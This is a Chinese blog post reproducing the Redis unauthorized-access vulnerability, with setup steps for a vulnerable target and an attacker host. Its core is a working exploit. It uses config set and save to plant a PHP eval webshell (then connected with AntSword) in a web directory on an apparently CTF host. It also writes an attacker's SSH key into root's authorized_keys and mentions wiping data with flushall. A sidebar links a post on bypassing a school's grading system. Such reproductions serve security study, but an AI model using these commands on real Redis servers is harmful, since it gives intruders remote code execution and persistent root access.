当前位置:首页 > DayDayUp > 正文内容

redis未授权访问漏洞复现

Luz1年前 (2021-08-09)DayDayUp1370

环境搭建

靶机:

wget http://download.redis.io/releases/redis-2.8.17.tar.gz  //服务下载
tar xzfredis-2.8.17.tar.gz   //文件解压
cd redis-2.8.17  //目录切换
make  //编译
cp redis.conf   /etc 
cd src 
./redis-server /etc/redis.conf       //服务初始化与启动

image.png

服务启动


攻击端:

yum install redis   //安装(Centos)

redis-cli -h hostname  //连接

image.png

测试连接成功


漏洞利用条件

  1. redis服务挂在0.0.0.0:6379,且未设置防火墙(即外网可连接)

  2. 没有设置密码(默认条件)


漏洞利用姿势

  1. 泄露敏感数据,或者使用flushall恶意清空数据

  2. 通过eval执行代码(写入文件)

  3. 修改ssh公钥文件,实现ssh登录(需要redis以root权限运行)


webshell写入

附加条件:知道web路径,具有文件读写权限


已知路径:/www/wwwroot/pboot.huctf.cn/PbootCMS-2.0.8

config set dir /www/wwwroot/pboot.huctf.cn/PbootCMS-2.0.8     //目录切换
config set dbfilename webshell.php    //创建文件
set webshell " <?php @eval($_POST['123']);?> "    //将马写入文件
save    //保存文件

攻击机视角: 

image.png


靶机视角:

image.png


第三人视角(访问木马):

image.png




蚁剑连接:

image.png

image.png



SSH公钥修改

附加条件:开启sshd服务

ssh-keygen -t rsa  //在本地主机生成密钥key
cd /root/.ssh
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt
cat /root/key.txt
cat /root/key.txt | redis-cli -h 【host】  //将txt文件中的公钥导入Redis缓存
cat /root/key.txt | redis-cli -h 【host】 –x set xxx //使用redis-cli -h ip命令连接靶机,将文件写入
redis-cli -h host
config set dir /root/.ssh    //切换目录到ssh公钥目录
config set dbfilename authorized_keys    //创建公钥文件
save    //保存文件


相关文章

AWD赛后总结与反思

AWD赛后总结与反思

大概有半年多没有打过网络安全的竞赛了,最近被拉去打了国赛,当然是纯被打的角色,从前打的都是CTF,AWD的赛制、规则、注意点都与之有天壤之别。不出意料没拿到什么奖,总结了一下国赛AWD的经验,自己还是小白,所以请大佬绕道。一、赛前查的资料赛...

湖州师范学院期末考试成绩提前查询(教务系统绕过)

湖州师范学院期末考试成绩提前查询(教务系统绕过)

20220501更新教务系统已换新,新版查询方法见:https://hyluz.cn/?id=65522新版查询接口:http://cjcx.hyluz.cn/下文方法已不可用登录登录教务系统  (学校教务系统均可/default...

软件著作权申请流程(软著申请流程详解)

软件著作权申请流程(软著申请流程详解)

以前都是找第三方代办,最近发现软著不用手续费了,自己付个快递钱就能申请了,被打回来也没什么损失,记录一下流程。账号注册在中国版权保护中心注册账号官网:http://www.ccopyright.com.cn/注册页面链接:https://r...

删除Halo桌面卸载后残余的halodesktop文件夹

删除Halo桌面卸载后残余的halodesktop文件夹

现象:残留Halo桌面写在后在 C:\Program Files (x86) 残留目录HaloDesktop其中存在HaloSvc.dll文件被Desktop Arrangement Helper Service使用,导致整个文件夹无法删除...

nginx反向代理配置

server{    listen 80;    //监听端口    host 1.1.1.1;    //监听地址location /{  &nbs...

斐波那契数列 前2000个数

偶尔有脑洞题需要用到,算了一些方便查询计算脚本:fib_recur1=[0]*500 fib_recur1[-1]=0 fib_recur1[0]=1 fib_recur1[1]=1 def fib_recur(n):...

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。